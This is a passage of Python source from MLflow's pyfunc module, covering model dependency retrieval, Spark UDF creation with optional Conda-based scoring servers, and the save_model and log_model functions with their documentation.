                if isinstance(dep, dict) and "pip" in dep:
                    pip_deps_index = index
                    break
            else:
                raise MlflowException(
                    "No pip section found in conda.yaml file in the model directory.",
                    error_code=RESOURCE_DOES_NOT_EXIST,
                )
            # Pop the pip entry so only the excluded conda deps remain in conda_deps.
            pip_deps = conda_deps.pop(pip_deps_index)["pip"]
            tmp_dir = tempfile.mkdtemp()
            pip_file_path = os.path.join(tmp_dir, _REQUIREMENTS_FILE_NAME)
            with open(pip_file_path, "w") as f:
                f.write("\n".join(pip_deps) + "\n")
            if len(conda_deps) > 0:
                _logger.warning(
                    "The following conda dependencies have been excluded from the environment file:"
                    f" {', '.join(conda_deps)}."
                )
            return pip_file_path
    elif format == "conda":
        conda_yml_path = _download_model_conda_env(model_uri)
        return conda_yml_path
    else:
        raise MlflowException(
            f"Illegal format argument '{format}'.", error_code=INVALID_PARAMETER_VALUE
        )
def get_model_dependencies(model_uri, format="pip"):  # pylint: disable=redefined-builtin
    """
    :param model_uri: The uri of the model to get dependencies from.
    :param format: The format of the returned dependency file. If the ``"pip"`` format is
                   specified, the path to a pip ``requirements.txt`` file is returned.
                   If the ``"conda"`` format is specified, the path to a ``"conda.yaml"``
                   file is returned. If the ``"pip"`` format is specified but the model
                   was not saved with a ``requirements.txt`` file, the ``pip`` section
                   of the model's ``conda.yaml`` file is extracted instead, and any
                   additional conda dependencies are ignored. Default value is ``"pip"``.
    :return: The local filesystem path to either a pip ``requirements.txt`` file
             (if ``format="pip"``) or a ``conda.yaml`` file (if ``format="conda"``)
             specifying the model's dependencies.
    """
    dep_file = _get_model_dependencies(model_uri, format)
    if format == "pip":
        # Inside a Databricks notebook pip must be invoked via the %pip magic.
        command_prefix = "%" if is_in_databricks_runtime() else ""
        _logger.info(
            "To install these model dependencies, run the "
            f"following command: '{command_prefix}pip install -r {dep_file}'."
        )
    return dep_file
@deprecated("mlflow.pyfunc.load_model", 1.0)
def load_pyfunc(model_uri, suppress_warnings=False):
    """
    Load a model stored in Python function format.

    .. note:: Deprecated since 1.0; use :py:func:`load_model` instead.

    :param model_uri: The location, in URI format, of the MLflow model. For example:

                      - ``/Users/me/path/to/local/model``
                      - ``relative/path/to/local/model``
                      - ``s3://my_bucket/path/to/model``
                      - ``runs:/<mlflow_run_id>/run-relative/path/to/model``
                      - ``models:/<model_name>/<model_version>``
                      - ``models:/<model_name>/<stage>``
                      - ``mlflow-artifacts:/path/to/model``

                      For more information about supported URI schemes, see
                      `Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
                      artifact-locations>`_.
    :param suppress_warnings: If ``True``, non-fatal warning messages associated with the model
                              loading process will be suppressed. If ``False``, these warning
                              messages will be emitted.
    """
    # Thin deprecated wrapper: delegate straight to the supported entry point.
    return load_model(model_uri=model_uri, suppress_warnings=suppress_warnings)
def _warn_potentially_incompatible_py_version_if_necessary(model_py_version=None):
    """
    Compares the version of Python that was used to save a given model with the
    version of Python that is currently running. If a major or minor version
    difference is detected, logs an appropriate warning.
    """
    if model_py_version is None:
        # Nothing recorded at save time: we can only flag the uncertainty.
        _logger.warning(
            "The specified model does not have a specified Python version. It may be"
            " incompatible with the version of Python that is currently running: Python %s",
            PYTHON_VERSION,
        )
        return
    saved_version = get_major_minor_py_version(model_py_version)
    running_version = get_major_minor_py_version(PYTHON_VERSION)
    if saved_version != running_version:
        _logger.warning(
            "The version of Python that the model was saved in, `Python %s`, differs"
            " from the version of Python that is currently running, `Python %s`,"
            " and may be incompatible",
            model_py_version,
            PYTHON_VERSION,
        )
def _create_model_downloading_tmp_dir(should_use_nfs):
    """Create and return a fresh temp directory for downloading a model into."""
    base_tmp_dir = get_or_create_nfs_tmp_dir() if should_use_nfs else get_or_create_tmp_dir()
    model_cache_root = os.path.join(base_tmp_dir, "models")
    os.makedirs(model_cache_root, exist_ok=True)
    tmp_model_dir = tempfile.mkdtemp(dir=model_cache_root)
    # mkdtemp creates a directory with permission 0o700
    # change it to be 0o777 to ensure it can be seen in spark UDF
    os.chmod(tmp_model_dir, 0o777)
    return tmp_model_dir
@cache_return_value_per_process
def _get_or_create_env_root_dir(should_use_nfs):
    """Return the per-process root directory under which model environments live."""
    base_tmp_dir = get_or_create_nfs_tmp_dir() if should_use_nfs else get_or_create_tmp_dir()
    env_root_dir = os.path.join(base_tmp_dir, "envs")
    os.makedirs(env_root_dir, exist_ok=True)
    return env_root_dir
_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP = 200
def spark_udf(spark, model_uri, result_type="double", env_manager="local"):
    """
    A Spark UDF that can be used to invoke the Python function formatted model.

    Parameters passed to the UDF are forwarded to the model as a DataFrame where the column names
    are ordinals (0, 1, ...). On some versions of Spark (3.0 and above), it is also possible to
    wrap the input in a struct. In that case, the data will be passed as a DataFrame with column
    names given by the struct definition (e.g. when invoked as my_udf(struct('x', 'y')), the model
    will get the data as a pandas DataFrame with 2 columns 'x' and 'y').

    If a model contains a signature, the UDF can be called without specifying column name
    arguments. In this case, the UDF will be called with column names from signature, so the
    evaluation dataframe's column names must match the model signature's column names.

    The predictions are filtered to contain only the columns that can be represented as the
    ``result_type``. If the ``result_type`` is string or array of strings, all predictions are
    converted to string. If the result type is not an array type, the left most column with
    matching type is returned.

    NOTE: Inputs of type ``pyspark.sql.types.DateType`` are not supported on earlier versions of
    Spark (2.4 and below).

    .. code-block:: python
        :caption: Example

        from pyspark.sql.functions import struct

        predict = mlflow.pyfunc.spark_udf(spark, "/my/local/model")
        df.withColumn("prediction", predict(struct("name", "age"))).show()

    :param spark: A SparkSession object.
    :param model_uri: The location, in URI format, of the MLflow model with the
                      :py:mod:`mlflow.pyfunc` flavor. For example:

                      - ``/Users/me/path/to/local/model``
                      - ``relative/path/to/local/model``
                      - ``s3://my_bucket/path/to/model``
                      - ``runs:/<mlflow_run_id>/run-relative/path/to/model``
                      - ``models:/<model_name>/<model_version>``
                      - ``models:/<model_name>/<stage>``
                      - ``mlflow-artifacts:/path/to/model``

                      For more information about supported URI schemes, see
                      `Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
                      artifact-locations>`_.
    :param result_type: the return type of the user-defined function. The value can be either a
        ``pyspark.sql.types.DataType`` object or a DDL-formatted type string. Only a primitive
        type or an array ``pyspark.sql.types.ArrayType`` of primitive type are allowed.
        The following classes of result type are supported:

        - "int" or ``pyspark.sql.types.IntegerType``: The leftmost integer that can fit in an
          ``int32`` or an exception if there is none.
        - "long" or ``pyspark.sql.types.LongType``: The leftmost long integer that can fit in an
          ``int64`` or an exception if there is none.
        - ``ArrayType(IntegerType|LongType)``: All integer columns that can fit into the requested
          size.
        - "float" or ``pyspark.sql.types.FloatType``: The leftmost numeric result cast to
          ``float32`` or an exception if there is none.
        - "double" or ``pyspark.sql.types.DoubleType``: The leftmost numeric result cast to
          ``double`` or an exception if there is none.
        - ``ArrayType(FloatType|DoubleType)``: All numeric columns cast to the requested type or
          an exception if there are no numeric columns.
        - "string" or ``pyspark.sql.types.StringType``: The leftmost column converted to
          ``string``.
        - ``ArrayType(StringType)``: All columns converted to ``string``.

    :param env_manager: The environment manager to use in order to create the
        software environment for model inference. Default value is ``local``,
        The following values are supported:

        - ``conda``: (Recommended) Use Conda to restore the software environment
          that was used to train the model. Note that environment is only restored
          in the context of the PySpark UDF; the software environment outside of
          the UDF is unaffected.
        - ``local``: Use the current Python environment for model inference, which
          may differ from the environment used to train the model and may lead to
          errors or invalid predictions.

    :return: Spark UDF that applies the model's ``predict`` method to the data and returns a
             type specified by ``result_type``, which by default is a double.
    """
    # Scope Spark import to this method so users don't need pyspark to use non-Spark-related
    # functionality.
    import functools

    from mlflow.pyfunc.spark_model_cache import SparkModelCache
    from mlflow.utils._spark_utils import _SparkDirectoryDistributor
    from pyspark.sql.functions import pandas_udf
    from pyspark.sql.types import _parse_datatype_string
    from pyspark.sql.types import (
        ArrayType,
        DataType as SparkDataType,
        StructType as SparkStructType,
    )
    from pyspark.sql.types import DoubleType, IntegerType, FloatType, LongType, StringType
    from mlflow.models.cli import _get_flavor_backend

    env_manager = _EnvManager.from_string(env_manager)

    # Check whether spark is in local or local-cluster mode
    # this case all executors and driver share the same filesystem
    is_spark_in_local_mode = spark.conf.get("spark.master").startswith("local")

    nfs_root_dir = get_nfs_cache_root_dir()
    should_use_nfs = nfs_root_dir is not None
    # Only fall back to Spark file distribution when executors cannot reach the driver's
    # filesystem directly (neither local mode nor a shared NFS directory is available).
    should_use_spark_to_broadcast_file = not (is_spark_in_local_mode or should_use_nfs)
    conda_env_root_dir = _get_or_create_env_root_dir(should_use_nfs)

    if not isinstance(result_type, SparkDataType):
        result_type = _parse_datatype_string(result_type)

    elem_type = result_type
    if isinstance(elem_type, ArrayType):
        elem_type = elem_type.elementType

    supported_types = [IntegerType, LongType, FloatType, DoubleType, StringType]

    if not any(isinstance(elem_type, x) for x in supported_types):
        raise MlflowException(
            message="Invalid result_type '{}'. Result type can only be one of or an array of one "
            "of the following types: {}".format(str(elem_type), str(supported_types)),
            error_code=INVALID_PARAMETER_VALUE,
        )

    local_model_path = _download_artifact_from_uri(
        artifact_uri=model_uri, output_path=_create_model_downloading_tmp_dir(should_use_nfs)
    )

    if env_manager is _EnvManager.LOCAL:
        # Assume spark executor python environment is the same with spark driver side.
        _warn_dependency_requirement_mismatches(local_model_path)
        _logger.warning(
            'Calling `spark_udf()` with `env_manager="local"` does not recreate the same '
            "environment that was used during training, which may lead to errors or inaccurate "
            'predictions. We recommend specifying `env_manager="conda"`, which automatically '
            "recreates the environment that was used to train the model and performs inference "
            "in the recreated environment."
        )
    else:
        _logger.info(
            "This UDF will use Conda to recreate the model's software environment for inference. "
            "This may take extra time during execution."
        )
        if not sys.platform.startswith("linux"):
            # TODO: support killing mlflow server launched in UDF task when spark job canceled
            # for non-linux system.
            # https://stackoverflow.com/questions/53208/how-do-i-automatically-destroy-child-processes-in-windows
            _logger.warning(
                "In order to run inference code in restored python environment, PySpark UDF "
                "processes spawn MLflow Model servers as child processes. Due to system "
                "limitations with handling SIGKILL signals, these MLflow Model server child "
                "processes cannot be cleaned up if the Spark Job is canceled."
            )

    if not should_use_spark_to_broadcast_file:
        # Prepare restored environment in driver side if possible.
        # Note: In databricks runtime, because databricks notebook cell output cannot capture
        # child process output, so that set capture_output to be True so that when `conda prepare
        # env` command failed, the exception message will include command stdout/stderr output.
        # Otherwise user have to check cluster driver log to find command stdout/stderr output.
        # In non-databricks runtime, set capture_output to be False, because the benefit of
        # "capture_output=False" is the output will be printed immediately, otherwise you have
        # to wait conda command fail and suddenly get all output printed (included in error
        # message).
        if env_manager is _EnvManager.CONDA:
            _get_flavor_backend(
                local_model_path,
                env_manager=_EnvManager.CONDA,
                install_mlflow=False,
                env_root_dir=conda_env_root_dir,
            ).prepare_env(model_uri=local_model_path, capture_output=is_in_databricks_runtime())

    # Broadcast local model directory to remote worker if needed.
    if should_use_spark_to_broadcast_file:
        archive_path = SparkModelCache.add_local_model(spark, local_model_path)

    model_metadata = Model.load(os.path.join(local_model_path, MLMODEL_FILE_NAME))

    def _predict_row_batch(predict_fn, args):
        # Assemble a single pandas DataFrame from the UDF arguments (either one struct
        # column already materialized as a DataFrame, or several unnamed Series), run
        # `predict_fn`, then coerce the result to the requested `result_type`.
        input_schema = model_metadata.get_input_schema()
        pdf = None

        for x in args:
            if type(x) == pandas.DataFrame:
                if len(args) != 1:
                    raise Exception(
                        "If passing a StructType column, there should be only one "
                        "input column, but got %d" % len(args)
                    )
                pdf = x
        if pdf is None:
            args = list(args)
            if input_schema is None:
                names = [str(i) for i in range(len(args))]
            else:
                names = input_schema.input_names()
                if len(args) > len(names):
                    args = args[: len(names)]
                if len(args) < len(names):
                    raise MlflowException(
                        "Model input is missing columns. Expected {0} input columns {1},"
                        " but the model received only {2} unnamed input columns"
                        " (Since the columns were passed unnamed they are expected to be in"
                        " the order specified by the schema).".format(len(names), names, len(args))
                    )
            pdf = pandas.DataFrame(data={names[i]: x for i, x in enumerate(args)}, columns=names)

        result = predict_fn(pdf)
        if not isinstance(result, pandas.DataFrame):
            result = pandas.DataFrame(data=result)

        elem_type = result_type.elementType if isinstance(result_type, ArrayType) else result_type

        # Keep only the result columns representable as the requested element type.
        if type(elem_type) == IntegerType:
            result = result.select_dtypes(
                [np.byte, np.ubyte, np.short, np.ushort, np.int32]
            ).astype(np.int32)
        elif type(elem_type) == LongType:
            result = result.select_dtypes([np.byte, np.ubyte, np.short, np.ushort, int])
        elif type(elem_type) == FloatType:
            result = result.select_dtypes(include=(np.number,)).astype(np.float32)
        elif type(elem_type) == DoubleType:
            result = result.select_dtypes(include=(np.number,)).astype(np.float64)

        if len(result.columns) == 0:
            # BUGFIX: original message read "The the model ... Arraytype(StringType)".
            raise MlflowException(
                message="The model did not produce any values compatible with the requested "
                "type '{}'. Consider requesting udf with StringType or "
                "ArrayType(StringType).".format(str(elem_type)),
                error_code=INVALID_PARAMETER_VALUE,
            )

        if type(elem_type) == StringType:
            result = result.applymap(str)

        if type(result_type) == ArrayType:
            return pandas.Series(result.to_numpy().tolist())
        else:
            # Non-array result types return only the leftmost matching column.
            return result[result.columns[0]]

    result_type_hint = (
        pandas.DataFrame if isinstance(result_type, SparkStructType) else pandas.Series
    )

    @pandas_udf(result_type)
    def udf(
        iterator: Iterator[Tuple[Union[pandas.Series, pandas.DataFrame], ...]]
    ) -> Iterator[result_type_hint]:
        # importing here to prevent circular import
        from mlflow.pyfunc.scoring_server.client import ScoringServerClient

        # Note: this is a pandas udf function in iteration style, which takes an iterator of
        # tuple of pandas.Series and outputs an iterator of pandas.Series.
        scoring_server_proc = None

        # TODO: Support virtual env.
        if env_manager is _EnvManager.CONDA:
            if should_use_spark_to_broadcast_file:
                local_model_path_on_executor = _SparkDirectoryDistributor.get_or_extract(
                    archive_path
                )
                # Create individual conda_env_root_dir for each spark UDF task process.
                conda_env_root_dir_on_executor = _get_or_create_env_root_dir(should_use_nfs)
            else:
                local_model_path_on_executor = local_model_path
                conda_env_root_dir_on_executor = conda_env_root_dir

            pyfunc_backend = _get_flavor_backend(
                local_model_path_on_executor,
                workers=1,
                install_mlflow=False,
                env_manager=_EnvManager.CONDA,
                env_root_dir=conda_env_root_dir_on_executor,
            )

            if should_use_spark_to_broadcast_file:
                # Call "prepare_env" in advance in order to reduce scoring server launch time.
                # So that we can use a shorter timeout when call `client.wait_server_ready`,
                # otherwise we have to set a long timeout for `client.wait_server_ready` time,
                # this prevents spark UDF task failing fast if other exception raised when scoring
                # server launching.
                # Set "capture_output" so that if "conda env create" command failed, the command
                # stdout/stderr output will be attached to the exception message and included in
                # driver side exception.
                pyfunc_backend.prepare_env(
                    model_uri=local_model_path_on_executor, capture_output=True
                )

            # launch scoring server
            # TODO: adjust timeout for server requests handler.
            server_port = find_free_port()
            scoring_server_proc = pyfunc_backend.serve(
                model_uri=local_model_path_on_executor,
                port=server_port,
                host="127.0.0.1",
                enable_mlserver=False,
                synchronous=False,
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
            )

            server_tail_logs = collections.deque(
                maxlen=_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP
            )

            def server_redirect_log_thread_func(child_stdout):
                # Tee the server's output: keep a bounded tail for error reporting and
                # echo every line to this task's stdout with a recognizable prefix.
                for line in child_stdout:
                    if isinstance(line, bytes):
                        decoded = line.decode()
                    else:
                        decoded = line
                    server_tail_logs.append(decoded)
                    sys.stdout.write("[model server] " + decoded)

            server_redirect_log_thread = threading.Thread(
                target=server_redirect_log_thread_func, args=(scoring_server_proc.stdout,)
            )
            server_redirect_log_thread.setDaemon(True)
            server_redirect_log_thread.start()

            client = ScoringServerClient("127.0.0.1", server_port)

            try:
                client.wait_server_ready(timeout=90, scoring_server_proc=scoring_server_proc)
            except Exception:
                err_msg = "During spark UDF task execution, mlflow model server failed to launch. "
                if len(server_tail_logs) == _MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP:
                    err_msg += (
                        f"Last {_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP} "
                        "lines of MLflow model server output:\n"
                    )
                else:
                    err_msg += "MLflow model server output:\n"
                err_msg += "".join(server_tail_logs)
                raise MlflowException(err_msg)

            def batch_predict_fn(pdf):
                return client.invoke(pdf)

        elif env_manager is _EnvManager.LOCAL:
            if should_use_spark_to_broadcast_file:
                loaded_model, _ = SparkModelCache.get_or_load(archive_path)
            else:
                loaded_model = mlflow.pyfunc.load_model(local_model_path)

            def batch_predict_fn(pdf):
                return loaded_model.predict(pdf)

        try:
            for input_batch in iterator:
                # If the UDF is called with only multiple arguments,
                # the `input_batch` is a tuple which composes of several pd.Series/pd.DataFrame
                # objects.
                # If the UDF is called with only one argument,
                # the `input_batch` instance will be an instance of `pd.Series`/`pd.DataFrame`,
                if isinstance(input_batch, (pandas.Series, pandas.DataFrame)):
                    # UDF is called with only one argument
                    row_batch_args = (input_batch,)
                else:
                    row_batch_args = input_batch

                yield _predict_row_batch(batch_predict_fn, row_batch_args)
        finally:
            # Ensure the spawned scoring server is terminated when the task finishes
            # (normally or via cancellation on this executor).
            if scoring_server_proc is not None:
                os.kill(scoring_server_proc.pid, signal.SIGTERM)

    udf.metadata = model_metadata

    @functools.wraps(udf)
    def udf_with_default_cols(*args):
        # Zero-argument invocation: derive the input columns from the model signature,
        # failing loudly when the signature is missing or has no column names.
        if len(args) == 0:
            input_schema = model_metadata.get_input_schema()

            if input_schema and len(input_schema.inputs) > 0:
                if input_schema.has_input_names():
                    input_names = input_schema.input_names()
                    return udf(*input_names)
                else:
                    raise MlflowException(
                        message="Cannot apply udf because no column names specified. The udf "
                        "expects {} columns with types: {}. Input column names could not be "
                        "inferred from the model signature (column names not found).".format(
                            len(input_schema.inputs),
                            input_schema.inputs,
                        ),
                        error_code=INVALID_PARAMETER_VALUE,
                    )
            else:
                raise MlflowException(
                    "Attempting to apply udf on zero columns because no column names were "
                    "specified as arguments or inferred from the model signature.",
                    error_code=INVALID_PARAMETER_VALUE,
                )
        else:
            return udf(*args)

    return udf_with_default_cols
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name="scikit-learn"))
def save_model(
    path,
    loader_module=None,
    data_path=None,
    code_path=None,
    conda_env=None,
    mlflow_model=None,
    python_model=None,
    artifacts=None,
    signature: ModelSignature = None,
    input_example: ModelInputExample = None,
    pip_requirements=None,
    extra_pip_requirements=None,
    **kwargs,
):
    """
    save_model(path, loader_module=None, data_path=None, code_path=None, conda_env=None,\
               mlflow_model=Model(), python_model=None, artifacts=None)

    Save a Pyfunc model with custom inference logic and optional data dependencies to a path on the
    local filesystem.

    For information about the workflows that this method supports, please see :ref:`"workflows for
    creating custom pyfunc models" <pyfunc-create-custom-workflows>` and
    :ref:`"which workflow is right for my use case?" <pyfunc-create-custom-selecting-workflow>`.
    Note that the parameters for the second workflow: ``loader_module``, ``data_path`` and the
    parameters for the first workflow: ``python_model``, ``artifacts``, cannot be
    specified together.

    :param path: The path to which to save the Python model.
    :param loader_module: The name of the Python module that is used to load the model
                          from ``data_path``. This module must define a method with the prototype
                          ``_load_pyfunc(data_path)``. If not ``None``, this module and its
                          dependencies must be included in one of the following locations:

                          - The MLflow library.
                          - Package(s) listed in the model's Conda environment, specified by
                            the ``conda_env`` parameter.
                          - One or more of the files specified by the ``code_path`` parameter.

    :param data_path: Path to a file or directory containing model data.
    :param code_path: A list of local filesystem paths to Python file dependencies (or directories
                      containing file dependencies). These files are *prepended* to the system
                      path before the model is loaded.
    :param conda_env: {{ conda_env }}
    :param mlflow_model: :py:mod:`mlflow.models.Model` configuration to which to add the
                         **python_function** flavor.
    :param python_model: An instance of a subclass of :class:`~PythonModel`. This class is
                         serialized using the CloudPickle library. Any dependencies of the class
                         should be included in one of the following locations:

                         - The MLflow library.
                         - Package(s) listed in the model's Conda environment, specified by
                           the ``conda_env`` parameter.
                         - One or more of the files specified by the ``code_path`` parameter.

                         Note: If the class is imported from another module, as opposed to being
                         defined in the ``__main__`` scope, the defining module should also be
                         included in one of the listed locations.
    :param artifacts: A dictionary containing ``<name, artifact_uri>`` entries. Remote artifact URIs
                      are resolved to absolute filesystem paths, producing a dictionary of
                      ``<name, absolute_path>`` entries. ``python_model`` can reference these
                      resolved entries as the ``artifacts`` property of the ``context`` parameter
                      in :func:`PythonModel.load_context() <mlflow.pyfunc.PythonModel.load_context>`
                      and :func:`PythonModel.predict() <mlflow.pyfunc.PythonModel.predict>`.
                      For example, consider the following ``artifacts`` dictionary::

                        {
                            "my_file": "s3://my-bucket/path/to/my/file"
                        }

                      In this case, the ``"my_file"`` artifact is downloaded from S3. The
                      ``python_model`` can then refer to ``"my_file"`` as an absolute filesystem
                      path via ``context.artifacts["my_file"]``.

                      If ``None``, no artifacts are added to the model.
    :param signature: :py:class:`ModelSignature <mlflow.models.ModelSignature>`
                      describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
                      The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
                      from datasets with valid model input (e.g. the training dataset with target
                      column omitted) and valid model output (e.g. model predictions generated on
                      the training dataset), for example:

                      .. code-block:: python

                        from mlflow.models.signature import infer_signature

                        train = df.drop_column("target_label")
                        predictions = ...  # compute model predictions
                        signature = infer_signature(train, predictions)
    :param input_example: Input example provides one or several instances of valid
                          model input. The example can be used as a hint of what data to feed the
                          model. The given example can be a Pandas DataFrame where the given
                          example will be serialized to json using the Pandas split-oriented
                          format, or a numpy array where the example will be serialized to json
                          by converting it to a list. Bytes are base64-encoded.
    :param pip_requirements: {{ pip_requirements }}
    :param extra_pip_requirements: {{ extra_pip_requirements }}
    """
    _validate_env_arguments(conda_env, pip_requirements, extra_pip_requirements)

    # Legacy alias: callers may still pass the model config as the `model` keyword.
    mlflow_model = kwargs.pop("model", mlflow_model)
    if len(kwargs) > 0:
        raise TypeError("save_model() got unexpected keyword arguments: {}".format(kwargs))
    if code_path is not None:
        if not isinstance(code_path, list):
            raise TypeError("Argument code_path should be a list, not {}".format(type(code_path)))

    # The two supported workflows are mutually exclusive: "loader module" style
    # (loader_module/data_path) vs. "custom python model" style (python_model/artifacts).
    first_argument_set = {
        "loader_module": loader_module,
        "data_path": data_path,
    }
    second_argument_set = {
        "artifacts": artifacts,
        "python_model": python_model,
    }
    first_argument_set_specified = any(item is not None for item in first_argument_set.values())
    second_argument_set_specified = any(item is not None for item in second_argument_set.values())
    if first_argument_set_specified and second_argument_set_specified:
        raise MlflowException(
            message=(
                "The following sets of parameters cannot be specified together: {first_set_keys}"
                " and {second_set_keys}. All parameters in one set must be `None`. Instead, found"
                " the following values: {first_set_entries} and {second_set_entries}".format(
                    first_set_keys=first_argument_set.keys(),
                    second_set_keys=second_argument_set.keys(),
                    first_set_entries=first_argument_set,
                    second_set_entries=second_argument_set,
                )
            ),
            error_code=INVALID_PARAMETER_VALUE,
        )
    elif (loader_module is None) and (python_model is None):
        msg = (
            "Either `loader_module` or `python_model` must be specified. A `loader_module` "
            "should be a python module. A `python_model` should be a subclass of PythonModel"
        )
        raise MlflowException(message=msg, error_code=INVALID_PARAMETER_VALUE)

    _validate_and_prepare_target_save_path(path)

    if mlflow_model is None:
        mlflow_model = Model()
    if signature is not None:
        mlflow_model.signature = signature
    if input_example is not None:
        _save_example(mlflow_model, input_example, path)

    # Dispatch to the appropriate serialization routine for the chosen workflow.
    if first_argument_set_specified:
        return _save_model_with_loader_module_and_data_path(
            path=path,
            loader_module=loader_module,
            data_path=data_path,
            code_paths=code_path,
            conda_env=conda_env,
            mlflow_model=mlflow_model,
            pip_requirements=pip_requirements,
            extra_pip_requirements=extra_pip_requirements,
        )
    elif second_argument_set_specified:
        return mlflow.pyfunc.model._save_model_with_class_artifacts_params(
            path=path,
            python_model=python_model,
            artifacts=artifacts,
            conda_env=conda_env,
            code_paths=code_path,
            mlflow_model=mlflow_model,
            pip_requirements=pip_requirements,
            extra_pip_requirements=extra_pip_requirements,
        )
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name="scikit-learn"))
def log_model(
    artifact_path,
    loader_module=None,
    data_path=None,
    code_path=None,
    conda_env=None,
    python_model=None,
    artifacts=None,
    registered_model_name=None,
    signature: ModelSignature = None,
    input_example: ModelInputExample = None,
    await_registration_for=DEFAULT_AWAIT_MAX_SLEEP_SECONDS,
    pip_requirements=None,
    extra_pip_requirements=None,
):
    """
    Log a Pyfunc model with custom inference logic and optional data dependencies as an MLflow
    artifact for the current run.

    For information about the workflows that this method supports, see :ref:`Workflows for
    creating custom pyfunc models <pyfunc-create-custom-workflows>` and
    :ref:`Which workflow is right for my use case? <pyfunc-create-custom-selecting-workflow>`.
    You cannot specify the parameters for the second workflow: ``loader_module``, ``data_path``
    and the parameters for the first workflow: ``python_model``, ``artifacts`` together.

    :param artifact_path: The run-relative artifact path to which to log the Python model.
    :param loader_module: The name of the Python module that is used to load the model
                          from ``data_path``. This module must define a method with the prototype
                          ``_load_pyfunc(data_path)``. If not ``None``, this module and its
                          dependencies must be included in one of the following locations:

                          - The MLflow library.
                          - Package(s) listed in the model's Conda environment, specified by
                            the ``conda_env`` parameter.
                          - One or more of the files specified by the ``code_path`` parameter.

    :param data_path: Path to a file or directory containing model data.
    :param code_path: A list of local filesystem paths to Python file dependencies (or directories
                      containing file dependencies). These files are *prepended* to the system
                      path before the model is loaded.
    :param conda_env: {{ conda_env }}
    :param python_model: An instance of a subclass of :class:`~PythonModel`. This class is
                         serialized using the CloudPickle library. Any dependencies of the class
                         should be included in one of the following locations:

                         - The MLflow library.
                         - Package(s) listed in the model's Conda environment, specified by
                           the ``conda_env`` parameter.
                         - One or more of the files specified by the ``code_path`` parameter.

                         Note: If the class is imported from another module, as opposed to being
                         defined in the ``__main__`` scope, the defining module should also be
                         included in one of the listed locations.
    :param artifacts: A dictionary containing ``<name, artifact_uri>`` entries. Remote artifact URIs
                      are resolved to absolute filesystem paths, producing a dictionary of
                      ``<name, absolute_path>`` entries. ``python_model`` can reference these
                      resolved entries as the ``artifacts`` property of the ``context`` parameter
                      in :func:`PythonModel.load_context() <mlflow.pyfunc.PythonModel.load_context>`
                      and :func:`PythonModel.predict() <mlflow.pyfunc.PythonModel.predict>`.
                      For example, consider the following ``artifacts`` dictionary::

                        {
                            "my_file": "s3://my-bucket/path/to/my/file"
                        }

                      In this case, the ``"my_file"`` artifact is downloaded from S3. The
                      ``python_model`` can then refer to ``"my_file"`` as an absolute filesystem
                      path via ``context.artifacts["my_file"]``.

                      If ``None``, no artifacts are added to the model.
    :param registered_model_name: This argument may change or be removed in a
                                  future release without warning. If given, create a model
                                  version under ``registered_model_name``, also creating a
                                  registered model if one with the given name does not exist.
    :param signature: :py:class:`ModelSignature <mlflow.models.ModelSignature>`
                      describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
                      The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
                      from datasets with valid model input (e.g. the training dataset with target
                      column omitted) and valid model output (e.g. model predictions generated on
                      the training dataset), for example:

                      .. code-block:: python

                        from mlflow.models.signature import infer_signature

                        train = df.drop_column("target_label")
                        predictions = ...  # compute model predictions
                        signature = infer_signature(train, predictions)
    :param input_example: Input example provides one or several instances of valid
                          model input. The example can be used as a hint of what data to feed the
                          model. The given example can be a Pandas DataFrame where the given
                          example will be serialized to json using the Pandas split-oriented
                          format, or a numpy array where the example will be serialized to json
                          by converting it to a list. Bytes are base64-encoded.
    :param await_registration_for: Number of seconds to wait for the model version to finish
                            being created and is in ``READY`` status. By default, the function
                            waits for five minutes. Specify 0 or None to skip waiting.
    :param pip_requirements: {{ pip_requirements }}
    :param extra_pip_requirements: {{ extra_pip_requirements }}
    :return: A :py:class:`ModelInfo <mlflow.models.model.ModelInfo>` instance that contains the
             metadata of the logged model.
    """
    # Delegates to the generic Model.log helper, which in turn calls this flavor's
    # `save_model` and logs the resulting directory as run artifacts.
    return Model.log(
        artifact_path=artifact_path,
        flavor=mlflow.pyfunc,
        loader_module=loader_module,
        data_path=data_path,
        code_path=code_path,
        python_model=python_model,
        artifacts=artifacts,
        conda_env=conda_env,
        registered_model_name=registered_model_name,
        signature=signature,
        input_example=input_example,
        await_registration_for=await_registration_for,
        pip_requirements=pip_requirements,
        extra_pip_requirements=extra_pip_requirements,
    )
def _save_model_with_loader_module_and_data_path(
    path,
    loader_module,
    data_path=None,
    code_paths=None,
    conda_env=None,
    mlflow_model=None,
    pip_requirements=None,
    extra_pip_requirements=None,
):
    """
    Export model as a generic Python function model.

    :param path: The path to which to save the Python model.
    :param loader_module: The name of the Python module that is used to load the model
                          from ``data_path``. This module must define a method with the prototype
                          ``_load_pyfunc(data_path)``.
    :param data_path: Path to a file or directory containing model data.
    :param code_paths: A list of local filesystem paths to Python file dependencies (or directories
                      containing file dependencies). These files are *prepended* to the system
                      path before the model is loaded.
    :param conda_env: Either a dictionary representation of a Conda environment or the path to a
                      Conda environment yaml file. If provided, this describes the environment
                      this model should be run in.
    :param mlflow_model: Existing :py:mod:`mlflow.models.Model` configuration to add the flavor
                         to; a new one is created when ``None``.
    :param pip_requirements: Explicit pip requirements; when ``None``, requirements are inferred.
    :param extra_pip_requirements: Additional pip requirements appended to the inferred/default
                                   ones.
    :return: Model configuration containing model info.
    """
    data = None

    # Copy the model data into the export directory and record its relative location.
    if data_path is not None:
        model_file = _copy_file_or_tree(src=data_path, dst=path, dst_dir="data")
        data = model_file

    code_dir_subpath = _validate_and_copy_code_paths(code_paths, path)

    if mlflow_model is None:
        mlflow_model = Model()

    mlflow.pyfunc.add_to_model(
        mlflow_model,
        loader_module=loader_module,
        code=code_dir_subpath,
        data=data,
        env=_CONDA_ENV_FILE_NAME,
    )
    mlflow_model.save(os.path.join(path, MLMODEL_FILE_NAME))

